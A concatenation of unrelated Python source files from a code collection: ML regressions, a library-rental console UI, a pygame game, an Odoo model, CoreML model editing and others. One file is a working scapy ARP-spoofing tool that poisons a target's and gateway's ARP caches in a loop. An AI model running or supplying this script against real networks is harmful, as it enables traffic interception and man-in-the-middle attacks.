epsilon_rewards = epsilon_rewards + (total_rewards - epsilon_rewards) / (i + 1)
return epsilon_rewards
def get_epsilon_action(epsilon, env, mean_reward_per_bandit):
"""
This method will return action by epsilon greedy
:param epsilon: Parameter for Greedy Strategy, exploration vs exploitation
:param env: Gym environment to select random action (Exploration)
:param mean_reward_per_bandit: Mean reward per bandit for selecting greedily (Exploitation)
:return:
"""
explore = np.random.uniform() < epsilon
if explore:
return env.action_space.sample()
else:
return np.argmax(mean_reward_per_bandit)
if __name__ == "__main__":
main() |
13,120 | e2c7e8900ac6dc675a6135f4cd92bbb0e64ad17a | import lief
import yaml
import struct
virtualBaseAddress = 0x401000
textFileOffset = 0x400
binary = lief.parse("src/bayonetta.so")
symbols = binary.symbols
with open("link_map.yaml", "r") as stream:
data_loaded = yaml.load(stream)
f = open("out/Bayonetta.exe", "r+b")
for s in symbols:
if data_loaded.get(s.name, False):
target_address = data_loaded[s.name]
print(s.name, ":", hex(target_address))
fileAddress = target_address - virtualBaseAddress + textFileOffset
f.seek(fileAddress)
jmpOffset = s.value - ( target_address + 5)
f.write("\xE9"+struct.pack("<l", jmpOffset))
f.close()
|
13,121 | c5e6bf01689ab90a30d864069253c26545d32dcd | import numpy as np
import matplotlib.pyplot as plt
COLNUM = (0, 2, 13)
# def univariate_regression():
def read_file():
with open('housing.data') as f:
content = f.readlines()
content = [x.strip().split() for x in content]
for i in range(len(content)):
content[i] = [float(x) for x in content[i]]
return content
def mean_average_error(b, m, x, y):
n = float(y.shape[1])
tmp = np.abs(y - (m * x + b))
total_error = np.sum(tmp)
return total_error / n
def compute_error_for_line_given_points(b, m, x, y):
n = float(y.shape[1])
total_error = np.sum(np.power(y - (m * x + b), 2))
return total_error / (n * 2)
def step_gradient(b, m, x, y, learning_rate):
n = float(y.shape[1])
tmp = y - ((m * x) + b)
# tmp = np.power(tmp, 2)
b_gradient = -(1 / n) * np.sum(tmp)
m_gradient = -(1 / n) * tmp * x.T
current_b = b - (learning_rate * b_gradient)
current_m = m - (learning_rate * m_gradient[0, 0])
return current_b, current_m
def univariate_regression(x, y, learning_rate, num_of_iter):
m = b = 0
errors = [compute_error_for_line_given_points(b, m, x, y)]
for i in range(num_of_iter):
b, m = step_gradient(b, m, x, y, learning_rate)
errors.append(compute_error_for_line_given_points(b, m, x, y))
return b, m, errors
def main():
inputs = read_file()
x1 = np.matrix([x[COLNUM[0]] for x in inputs])
x2 = np.matrix([x[COLNUM[1]] for x in inputs])
y = np.matrix([x[COLNUM[2]] for x in inputs])
learning_rate = 0.01
num_of_iter = 10000
# plt.figure(1)
# plt.plot(x1, y, 'bo')
# plt.axis([-5, x1.max() + 5, -5, y.max() + 5])
# plt.ylabel('Price')
# plt.xlabel('Crime')
#
# plt.figure(2)
# plt.plot(x2, y, 'bo')
# plt.axis([-5, x2.max() + 5, -5, y.max() + 5])
# plt.ylabel('Price')
# plt.xlabel('Tax')
# plt.show()
b1, m1, errors1 = univariate_regression(x1, y, learning_rate, num_of_iter)
b2, m2, errors2 = univariate_regression(x2, y, learning_rate, num_of_iter)
print('-------- 1 --------')
print('y = %fx + %f' % (m1, b1))
print('MSE = %f' % np.asscalar(errors1[-1]))
print('MAE = %f' % mean_average_error(b1, m1, x1, y))
print('-------- 2 --------')
print('y = %fx + %f' % (m2, b2))
print('MSE = %f' % np.asscalar(errors2[-1]))
print('MAE = %f' % mean_average_error(b2, m2, x2, y))
plt.figure(1)
plt.title('Crime')
plt.subplot(211)
plt.axis([0, x1.max(), 0, y.max()])
x_arr = np.array(x1)[0]
y_arr = np.array(y)[0]
plt.plot(x_arr, y_arr, 'bo', x_arr, m1 * x_arr + b1, 'r')
plt.subplot(212)
plt.axis([0, num_of_iter, 0, errors1[0]])
plt.xlabel('iter')
plt.ylabel('err')
plt.plot(errors1)
plt.figure(2)
plt.title('Tax')
plt.subplot(211)
plt.axis([0, x2.max(), 0, y.max()])
x_arr = np.array(x2)[0]
y_arr = np.array(y)[0]
plt.plot(x_arr, y_arr, 'bo', x_arr, m2 * x_arr + b2, 'r')
plt.subplot(212)
plt.axis([0, num_of_iter, 0, errors2[0]])
plt.xlabel('iter')
plt.ylabel('err')
plt.plot(errors2)
plt.show()
if __name__ == "__main__":
main()
|
13,122 | 101c03eb24aa7e26e9f7ffc641aef85193d053c3 | from Book import *
from Client import *
from Rental import *
from BookRepo import *
from ClientRepo import *
from RentalRepo import *
from Service import *
from UndoController import *
import datetime
class UI:
def __init__(self,BookRepo,ClientRepo,RentalRepo,Service,UndoController):
self._bookRepo=BookRepo
self._clientRepo=ClientRepo
self._rentalRepo=RentalRepo
self._service=Service
self._undoController=UndoController
def book_ui(self):
print("1. Add book")
print("2. Remove book")
print("3. Update book")
print("4. List books")
print("0. Return")
while True:
option = input(">>")
try:
if option == "1":
self.add_book_ui()
elif option == "2":
self.remove_book_ui()
elif option == "3":
self.update_book_ui()
elif option == "4":
self.list_books()
elif option=="0":
self.print_menu()
return
else:
print("Bad command")
except BookException as be:
print(be)
except RentalException as re:
print(re)
except ServiceException as se:
print(se)
except UndoException as ue:
print(ue)
def client_ui(self):
print("1. Add a client")
print("2. Remove a client")
print("3. Update a client")
print("4. List clients")
print("0. Return")
while True:
option = input(">>")
try:
if option == "1":
self.add_client_ui()
elif option == "2":
self.remove_client_ui()
elif option == "3":
self.update_client_ui()
elif option == "4":
self.list_clients()
elif option=="0":
self.print_menu()
return
else:
print("Bad command")
except ClientException as ce:
print(ce)
except RentalException as re:
print(re)
except ServiceException as se:
print(se)
except UndoException as ue:
print(ue)
def rental_ui(self):
print("1. Rent book")
print("2. Return book")
print("3. List rentals")
print("0. Return")
while True:
option = input(">>")
try:
if option == "1":
self.rent_book_ui()
elif option == "2":
self.return_book_ui()
elif option == "3":
self.list_rentals()
elif option=="0":
self.print_menu()
return
else:
print("Bad command")
except BookException as be:
print(be)
except ClientException as ce:
print(ce)
except RentalException as re:
print(re)
except ServiceException as se:
print(se)
except UndoException as ue:
print(ue)
def add_book_ui(self):
'''
Reads the book parameters(id,title,author)
'''
id=input("Book ID= ")
title=input("title= ")
author=input("author= ")
print(self._service.add_book(id,title,author))
def remove_book_ui(self):
'''
Reads the book id for the book that will be removed
Raises ServiceException if the id is not an integer or the id is negative
'''
id=input("Book ID= ")
msg=self._service.remove_book(id)
print(msg)
def update_book_ui(self):
'''
Reads the book parameters(id,title,author) for updating the existent book of the same id with the new params.
Raises BookException if id is not an integer
'''
id=input("Book ID= ")
title=input("title= ")
author=input("author= ")
msg=self._service.update_book(id,title,author)
print(msg)
def list_books(self):
'''
Prints the books from the list
'''
if len(self._bookRepo.Books)==0:
print("List is empty")
for b in self._bookRepo.Books:
print(b)
def add_client_ui(self):
'''
Reads the client parameters(id,name)
Raises ClientException in case the id is not an integer
'''
id=input("Client ID= ")
name=input("Name= ")
print(self._service.add_client(id,name))
def remove_client_ui(self):
'''
Reads the client id of the client that will be removed
Raises ClientException in case the id is not an integer or the id is negative
'''
id=input("Client ID= ")
msg=self._service.remove_client(id)
print(msg)
def update_client_ui(self):
'''
Reads the client parameters(id,name) for updating the existent client of the same id with the new name
Raises ClientException in case the id is not an integer
'''
id=input("Client ID= ")
name=input("Name= ")
msg=self._service.update_client(id,name)
print(msg)
def list_clients(self):
'''
Prints the clients from the list
'''
if len(self._clientRepo.Clients)==0:
print("List is empty")
for c in self._clientRepo.Clients:
print(c)
def list_rentals(self):
for r in self._rentalRepo._rentalList:
print(r)
def list_rentals_client(self,listC):
for r in listC:
print(r)
def rent_book_ui(self):
id = input("ID rental: ")
idc=input("ID Client: ")
idb=input("ID book: ")
day=input("Day the rental took place: ")
month=input("Month the rental took place(number): ")
year=input("Year the rental took place: ")
print(self._service.rent_book(id,idb,idc,day,month,year))
def return_book_ui(self):
idc=input("ID client: ")
idc=self._service.validate_return_idc(idc)
rentals=self._rentalRepo.get_rentals(idc)
if rentals==[]:
print("There is no rental to be completed!")
return
self.list_rentals_client(rentals)
id=input("ID rental for return: ")
returnDay=input("Day the book was returned: ")
returnMonth=input("Month the book was returned(number): ")
returnYear=input("Year the book was returned: ")
print(self._service.return_book(rentals,id,idc,returnDay,returnMonth,returnYear))
def find_book_ui(self):
print("1. Find by id")
print("2. Find by title")
print("3. Find by author")
print("0. Return")
while True:
option = input(">>")
try:
if option == '1':
id = input("ID= ")
if id.isdigit() == False:
raise BookException("ID must be an integer")
id = int(id)
print(self._bookRepo.find_book_id(id))
elif option == '2':
title = input("Title= ")
if title == "":
raise BookException("Title cannot be empty")
findList = []
findList.extend(self._bookRepo.find_book_title(title))
for b in findList:
print(b)
elif option == '3':
author = input("Author= ")
if author == "":
raise BookException("Author cannot be empty")
findList = []
findList.extend(self._bookRepo.find_book_author(author))
for b in findList:
print(b)
elif option=='0':
self.print_menu()
return
else:
print("Bad command")
except BookException as be:
print(be)
except RentalException as re:
print(re)
except ServiceException as se:
print(se)
except UndoException as ue:
print(ue)
def find_client_ui(self):
print("1. Find by id")
print("2. Find by name")
print("0. Return")
while True:
option=input(">>")
try:
if option=='1':
id=input("ID= ")
if id.isdigit()==False:
raise ClientException("ID must be an integer")
id=int(id)
print(self._clientRepo.find_client_id(id))
elif option=='2':
name=input("Name= ")
if name=="":
raise ClientException("Name cannot be empty")
findList=[]
findList.extend(self._clientRepo.find_client_name(name))
for c in findList:
print(c)
elif option=='0':
self.print_menu()
return
else:
print("Bad command")
except ClientException as ce:
print(ce)
except RentalException as re:
print(re)
except ServiceException as se:
print(se)
except UndoException as ue:
print(ue)
def most_rented_books_ui(self):
for b in self._service.most_rented_books():
print(b)
def most_active_clients_ui(self):
for c in self._service.most_active_clients():
print(c)
def most_rented_authors_ui(self):
for a in self._service.most_rented_authors():
print(a)
def statistics_ui(self):
print("1. Most rented books")
print("2. Most active clients")
print("3. Most rented author")
print("0. Return")
while True:
option=input(">>")
try:
if option == '1':
self.most_rented_books_ui()
elif option == '2':
self.most_active_clients_ui()
elif option == '3':
self.most_rented_authors_ui()
elif option=='0':
self.print_menu()
return
else:
print("Bad command")
except BookException as be:
print(be)
except ClientException as ce:
print(ce)
except RentalException as re:
print(re)
except ServiceException as se:
print(se)
except UndoException as ue:
print(ue)
def print_menu(self):
print("1. Book menu")
print("2. Client menu")
print("3. Rental menu")
print("4. Find a book")
print("5. Find a client")
print("6. Statistics")
print("7. Undo")
print("8. Redo")
print("0. Exit")
def start(self):
self.print_menu()
while True:
choice=input(">>")
try:
if choice=="1":
self.book_ui()
elif choice=="2":
self.client_ui()
elif choice=="3":
self.rental_ui()
elif choice=="4":
self.find_book_ui()
elif choice=="5":
self.find_client_ui()
elif choice=="6":
self.statistics_ui()
elif choice=="7":
self._undoController.undo()
elif choice=="8":
self._undoController.redo()
elif choice=="0":
return
else:
print("Bad command")
except BookException as be:
print(be)
except ClientException as ce:
print(ce)
except RentalException as re:
print(re)
except ServiceException as se:
print(se)
except UndoException as ue:
print(ue) |
13,123 | e73aedd957073c92475bbf71c46b5e340f9a49b4 | import json
json_string = u'{ "id":"mark@foo.com" }'
obj = json.loads(json_string)
print obj |
13,124 | d86054682110428a0074e3db853fa6bb5cd82340 | import jsons
from block import Block
# Basically just a linked list
from blockchain import Blockchain
# Save the block to the filesystem
def save_block(block):
chaindata_dir = 'chaindata'
# Generate filename by interpolating a string, will be saved as json
# i.e chaindata/42.json is block 42 in the chaindata folder
filename = '%s/%s.json' % (chaindata_dir, block.blockNo)
print(filename)
# The with keyword executes a pair of related operations, with a block
# of code in between. Here it will open a file, manipulate it, and automatically
# close it. It is guaranteed to close the file regardless of how the nested block exits
with open(filename, 'w') as block_file:
print(block)
block_file.write(str(jsons.dump(block)))
# Execute our blockchain
blockchain = Blockchain()
# Mine 10 blocks
for n in range(3):
blockchain.mine(Block("Block " + str(n + 1)))
# iterate through blockchain printing everything
while blockchain.head is not None:
print(blockchain.head)
save_block(blockchain.head)
blockchain.head = blockchain.head.next
|
13,125 | b5f7e514bf1195bd904b28cf0c9a20e63f338e4b | class NativeDictionary:
def __init__(self, sz):
self.size = sz
self.slots = [None] * self.size
self.values = [None] * self.size
def hash_fun(self, key):
# в качестве key поступают строки!
# всегда возвращает корректный индекс слота
if self.is_key(key):
return self.slots.index(key)
try:
index = len(key.encode('utf-8')) % self.size
return index
except ZeroDivisionError:
return 0
def is_key(self, key):
# возвращает True если ключ имеется,
# иначе False
if key in self.slots:
return True
return False
def put(self, key, value):
# гарантированно записываем
# значение value по ключу key
if self.is_key(key):
index = self.slots.index(key)
self.values[index] = value
return None
counter = 0
index = self.hash_fun(key)
while counter < self.size:
index = index + 1
if index >= self.size:
index = index - self.size
if self.slots[index] is None:
self.slots[index] = key
self.values[index] = value
return None
counter = counter + 1
return None
def get(self, key):
# возвращает value для key,
# или None если ключ не найден
try:
index = self.slots.index(key)
return self.values[index]
except ValueError:
return None
|
13,126 | 4204bbb18ca3b855278c0f39ddd1c82d5f7a21cd | import argparse
import sys
from scapy.all import *
from uuid import getnode
def find_my_IP_and_MAC():
""" I send echo pck when the ttl is 0 so when it arrive to the GW he send me back a TTL ERROR (ICMP MESSEGE)
, the dst is our ip.
"""
mac = ':'.join(re.findall('..', '%012x' % getnode()))
# I write IP and not domain cause i want to save time.
p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX",verbose=0,timeout=5) #verbose = withuot output
return mac,p.dst
def get_GW():
"""send echo pck when the ttl is 0 so when it arrive to the GW he send me back a TTL ERROR (ICMP MESSEGE)
, the src is the GW"""
p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX",verbose=0)
return p.src
def find_mac_by_ip(ip):
result = sr1(ARP(op=ARP.who_has, pdst=ip),verbose=0)
return result.hwsrc #The mac
def create_arp_response_packet(ipSrc,macSrc,ipDst,macDst):
return ARP(op=ARP.is_at, psrc=ipSrc, hwsrc=macSrc, hwdst=macDst, pdst=ipDst)
myMac, myIp =find_my_IP_and_MAC()
ipGW=get_GW()
parser = argparse.ArgumentParser(description='Process some arguments.')
parser.add_argument("-i" ,"--iface", type=str, default='enp0s3',
help="The attack interface")
parser.add_argument("-s" ,"--src", type=str, default=myIp,
help="The address you want for the attacker")
parser.add_argument("-d" ,"--delay", type=float, default=1,
help="Delay (in seconds) between messages")
parser.add_argument("-gw" ,"--gateway", action='count', default=0,
help="should GW be attacked as well")
#seperate between to types of argument: optional and required
required = parser.add_argument_group('required arguments')
required.add_argument("-t" ,"--target", type=str,
help="The attacked ip", required=True)
args = parser.parse_args()
def attack_ip(ip, delay): #both sides
macVic = find_mac_by_ip(ip)
macSrc, ipSrc = find_my_IP_and_MAC()
# create packs
macGW = find_mac_by_ip(ipGW)
pck = [create_arp_response_packet(ip, macSrc, ipGW, macGW)] # create a list with one packet
# pck.append(create_arp_response_packet(ipGW, macSrc, ip, macVic))
send(pck,count=50, inter=delay, loop=1)
def main():
macVic=find_mac_by_ip(args.target)
macSrc,ipSrc=find_my_IP_and_MAC()
# check if the user enter src
if ipSrc != args.src:
ipSrc=args.src
macSrc=find_mac_by_ip(ipSrc)
print 'src change'
#if the user -gw
if args.gateway>0:
macGW=find_mac_by_ip(ipGW)
pck=[create_arp_response_packet(args.target,macSrc,ipGW,macGW)] #create a list with one packet
pck.append(create_arp_response_packet(ipGW,macSrc,args.target,macVic))
else:
pck=create_arp_response_packet(ipGW,myMac,args.target,macVic)
send(pck,inter=args.delay,loop=2)
if __name__=="__main__":
main()
|
13,127 | 7d7c0e7c09cb371221e46cb3aaee6f19c2eba6fd | from ._sklearn import get_sklearn_wrapper as get_sklearn_wrapper
from sklearn import set_config
from hcrystalball.utils import optional_import
set_config(print_changed_only=False)
__all__ = ["get_sklearn_wrapper"]
__all__.extend(optional_import("hcrystalball.wrappers._prophet", "ProphetWrapper", globals()))
__all__.extend(
optional_import("hcrystalball.wrappers._statsmodels", "ExponentialSmoothingWrapper", globals())
)
__all__.extend(optional_import("hcrystalball.wrappers._statsmodels", "SimpleSmoothingWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._statsmodels", "HoltSmoothingWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._statsmodels", "ThetaWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._sarimax", "SarimaxWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._tbats", "TBATSWrapper", globals()))
__all__.extend(optional_import("hcrystalball.wrappers._tbats", "BATSWrapper", globals()))
|
13,128 | bb5f1d340a940b85f047a6925e352013183984b5 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, _
from odoo.exceptions import UserError, ValidationError
from datetime import datetime
import pytz
class CrmTeam(models.Model):
_inherit = 'crm.team'
pos_config_ids = fields.One2many('pos.config', 'crm_team_id', string="Point of Sales")
pos_sessions_open_count = fields.Integer(string='Open POS Sessions', compute='_compute_pos_sessions_open_count')
pos_order_amount_total = fields.Float(string="Session Sale Amount", compute='_compute_pos_order_amount_total')
def _compute_pos_sessions_open_count(self):
for team in self:
team.pos_sessions_open_count = self.env['pos.session'].search_count([('config_id.crm_team_id', '=', team.id), ('state', '=', 'opened')])
def _compute_pos_order_amount_total(self):
data = self.env['report.pos.order'].read_group([
('session_id.state', '=', 'opened'),
('config_id.crm_team_id', 'in', self.ids),
], ['price_total:sum', 'config_id'], ['config_id'])
rg_results = dict((d['config_id'][0], d['price_total']) for d in data)
for team in self:
team.pos_order_amount_total = sum([
rg_results.get(config.id, 0.0)
for config in team.pos_config_ids
])
|
13,129 | e2a1be7c4bb343b0b21dce9641653db46eeb405d | # -*- coding: utf-8 -*-
import sys
import time
reload(sys)
sys.setdefaultencoding('utf-8')
class obj:
def __init__(self,name,age):
self.__name=name
self.__age=age
# 把这些设置成私有变量
@property
def age(self):
return self.__age
@age.setter
def age(self,value):
if isinstance(value,int):
self.__age=value
else:
raise ValueError('非整数类型')
@age.deleter
def age(self):
print 'delete over'
a = obj('langzi',18)
# 使用这些装饰器,可以使用类与对象的方法直接调用
print a.age
# 这里就是直接调用返回age的值
a.age=20
# 这里就是直接使用setter把值转换
print a.age
del a.age
# 删除age
# 方法调用伪装成属性使用。在Django源码中常常有这种方法使用。
|
13,130 | d7be37c80b36d07e5b1269b145e33b88e198cb7d | import pygame as pg
FILEDIR = 'data'
tile_images = {
'wall': pg.image.load('{}/box.png'.format(FILEDIR)),
'empty': pg.image.load('{}/grass.png'.format(FILEDIR))
}
player_image = pg.image.load('{}/mario.png'.format(FILEDIR))
tile_width = tile_height = 50
player = None
# группы спрайтов
all_sprites = pg.sprite.Group()
tiles_group = pg.sprite.Group()
player_group = pg.sprite.Group()
def generate_level(level):
new_player, x, y = None, None, None
for y in range(len(level)):
for x in range(len(level[y])):
if level[y][x] == '.':
Tile('empty', x, y)
elif level[y][x] == '#':
Tile('wall', x, y, True)
elif level[y][x] == '@':
Tile('empty', x, y)
new_player = Player(x, y)
# вернем игрока, а также размер поля в клетках
return new_player, x, y
class Tile(pg.sprite.Sprite):
def __init__(self, tile_type, pos_x, pos_y, is_wall=False):
super().__init__(tiles_group, all_sprites)
self.image = tile_images[tile_type]
self.rect = self.image.get_rect().move(
tile_width * pos_x, tile_height * pos_y)
self.is_wall = is_wall
class Player(pg.sprite.Sprite):
def __init__(self, pos_x, pos_y):
super().__init__(player_group, all_sprites)
self.image = player_image
self.rect = self.image.get_rect().move(
tile_width * pos_x + 15, tile_height * pos_y + 5)
self.speed = 50
self.vel = pg.math.Vector2((0, 0))
def move(self, event):
if event.key == pg.K_DOWN:
self.rect.y += self.speed
if pg.sprite.spritecollideany(self, tiles_group).is_wall:
self.rect.y -= self.speed
if event.key == pg.K_UP:
self.rect.y -= self.speed
if pg.sprite.spritecollideany(self, tiles_group).is_wall:
self.rect.y += self.speed
if event.key == pg.K_RIGHT:
self.rect.x += self.speed
if pg.sprite.spritecollideany(self, tiles_group).is_wall:
self.rect.x -= self.speed
if event.key == pg.K_LEFT:
self.rect.x -= self.speed
if pg.sprite.spritecollideany(self, tiles_group).is_wall:
self.rect.x += self.speed
def start_screen(filedir):
intro_text = ["ЗАСТАВКА", "",
"Правила игры",
"Если в правилах несколько строк,",
"приходится выводить их построчно"]
fon = pg.transform.scale(pg.image.load('{}/fon.jpg'.format(filedir)), (WIDTH, HEIGHT))
screen.blit(fon, (0, 0))
font = pg.font.Font(None, 30)
text_coord = 50
for line in intro_text:
string_rendered = font.render(line, 1, pg.Color('black'))
intro_rect = string_rendered.get_rect()
text_coord += 10
intro_rect.top = text_coord
intro_rect.x = 10
text_coord += intro_rect.height
screen.blit(string_rendered, intro_rect)
def load_level(filename):
filename = FILEDIR + "/" + filename
# читаем уровень, убирая символы перевода строки
with open(filename, 'r') as mapFile:
level_map = [line.strip() for line in mapFile]
# и подсчитываем максимальную длину
max_width = max(map(len, level_map))
# дополняем каждую строку пустыми клетками ('.')
return list(map(lambda x: x.ljust(max_width, '.'), level_map))
if __name__ == '__main__':
pg.init()
SIZE = WIDTH, HEIGHT = (550, 500)
screen = pg.display.set_mode(SIZE)
clock = pg.time.Clock()
running = True
draw_area = False
player, level_x, level_y = generate_level(load_level('map1.txt'))
while running:
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
if event.type == pg.MOUSEBUTTONDOWN:
draw_area = True
if event.type == pg.KEYDOWN and draw_area:
player.move(event)
screen.fill(pg.Color('black'))
if not draw_area:
start_screen(FILEDIR)
else:
tiles_group.draw(screen)
# all_sprites.draw(screen)
player_group.draw(screen)
clock.tick(10)
pg.display.flip()
pg.quit()
|
13,131 | 449ef3403e52d5a3764d12103a491f0cace6e7fa | """
Project Name: Untitled Zombie Game
File Name: Constants.py
Author: Lex Hall
Last Updated: 11-15-2018
Python Version: 3.6
Pygame Version: 1.9.3
"""
# COLORS #
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
RED = (255, 0, 0)
FOG_OF_WAR = (220, 220, 220)
# COLORS #
FRAME_RATE = 60
WINDOW_X = 800
WINDOW_Y = 800
GAMEMAP_X = 1600
GAMEMAP_Y = 1600
PLAYER_MOVE_SPEED = 1
PLAYER_RUN_SPEED = 2
PLAYER_STRAFE_SPEED = 1
PLAYER_TURN_SPEED = 4 |
13,132 | f23508b5cef88d4163548d64ba560147f3b14ba5 | from rest_framework.generics import ListAPIView, CreateAPIView
from .models import NumberCounter
from .serializers import UnpairedSerializer, NumberCounterSerializer
class UnpairedAPIView(CreateAPIView):
"""
API View for send data list via POST method.
"""
serializer_class = UnpairedSerializer
class StatisticAPIView(ListAPIView):
"""
API View for get statistic.
"""
queryset = NumberCounter.objects.all()
serializer_class = NumberCounterSerializer
|
13,133 | e75da6623edb33177a9c30e11fc345ccb1604edd | """
this file takes the converted blazeface coreml model from convert_blazeface.py
and adds Non-maximum suppresion to create a pipeline.
currently multiple outputs in coreML with tf2.0 Keras is not working so working around to change the single
output in coreml to multiple output
"""
import coremltools
from coremltools.models import datatypes
from coremltools.models.pipeline import *
from PIL import Image
include_landmarks = False
blazeface_coreml = coremltools.models.MLModel("./coreml_models/blazeface.mlmodel")
blazeface_coreml._spec.description.output.pop(-1)
blazeface_coreml._spec.neuralNetwork.layers.pop(-1)
#adding the boxes output layer
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "boxes_pre"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append("model/concatenate_3/concat")
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 16])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([1,896, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.strides.extend([1,1,1])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.beginIds.extend([0, 0, 0])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.endIds.extend([2147483647, 2147483647, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.beginMasks.extend([True, True, True])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.endMasks.extend([True, True, False])
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("boxes_pre")
#squeezing the first dimension
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "boxes"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append("boxes_pre")
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 2
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([896, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.squeezeAll = True
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("boxes")
#creating the landmarks output layer
confidence_index = -6
if include_landmarks:
confidence_index = -8
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "landmarks_pre"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append("model/concatenate_3/concat")
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 16])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([1,896, 12])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.strides.extend([1,1,1])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.beginIds.extend([0, 0, 4])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.endIds.extend([2147483647, 2147483647, 16])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.beginMasks.extend([True, True, False])
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.endMasks.extend([True, True, True])
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("landmarks_pre")
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "landmarks"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append("landmarks_pre")
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 12])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 2
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([896, 12])
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.squeezeAll = True
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("landmarks")
# creating a new layer by squeezing confidence output
blazeface_coreml._spec.neuralNetwork.layers.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].sliceStatic.MergeFromString(b'')
blazeface_coreml._spec.neuralNetwork.layers[-1].name = "box_confidence"
blazeface_coreml._spec.neuralNetwork.layers[-1].input.append(blazeface_coreml._spec.neuralNetwork.layers[confidence_index].output[0])
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].rank = 3
blazeface_coreml._spec.neuralNetwork.layers[-1].inputTensor[0].dimValue.extend([1, 896, 1])
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor.add()
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].rank = 2
blazeface_coreml._spec.neuralNetwork.layers[-1].outputTensor[0].dimValue.extend([896, 1])
blazeface_coreml._spec.neuralNetwork.layers[-1].squeeze.squeezeAll = True
blazeface_coreml._spec.neuralNetwork.layers[-1].output.append("box_confidence")
#adding the output nodes to description
#adding box score layers
blazeface_coreml._spec.description.output.add()
blazeface_coreml._spec.description.output[0].name = "box_confidence"
blazeface_coreml._spec.description.output[0].type.multiArrayType.shape.extend([896, 1])
blazeface_coreml._spec.description.output[0].type.multiArrayType.dataType = datatypes._FeatureTypes_pb2.ArrayFeatureType.DOUBLE
#adding box output
blazeface_coreml._spec.description.output.add()
blazeface_coreml._spec.description.output[1].name = "boxes"
blazeface_coreml._spec.description.output[1].type.multiArrayType.shape.extend([896, 4])
blazeface_coreml._spec.description.output[1].type.multiArrayType.dataType = datatypes._FeatureTypes_pb2.ArrayFeatureType.DOUBLE
#adding landmark output
if include_landmarks:
blazeface_coreml._spec.description.output.add()
blazeface_coreml._spec.description.output[2].name = "landmarks"
